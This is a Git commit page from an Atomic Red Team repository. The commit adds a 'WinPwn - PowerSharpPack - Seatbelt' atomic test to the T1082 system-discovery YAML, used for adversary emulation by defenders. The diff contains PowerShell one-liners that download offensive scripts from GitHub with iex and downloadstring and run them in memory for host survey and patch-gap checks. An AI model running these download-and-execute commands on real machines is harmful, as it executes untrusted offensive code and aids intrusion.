security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1082.yaml (#1951)

Browse Source 
* Update T1082.yaml

 PowerSharpPack - Seatbelt technique via function of WinPwn performing Local Privileges escalation

* Update T1082.yaml

* Update T1082.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
tlor89
2022-05-12 18:53:54 -05:00
committed by GitHub
parent 36a7bbe95f
commit 7f14e048e0
1 changed files with 14 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1082/T1082.yaml
+14
View File
@@ -239,6 +239,7 @@ atomic_tests:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive
name: powershell
- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches
auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107
description: PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
@@ -259,3 +260,16 @@ atomic_tests:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"
name: powershell
- name: WinPwn - PowerSharpPack - Seatbelt
description: |-
PowerSharpPack - Seatbelt technique via function of WinPwn.
[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"; pause
name: powershell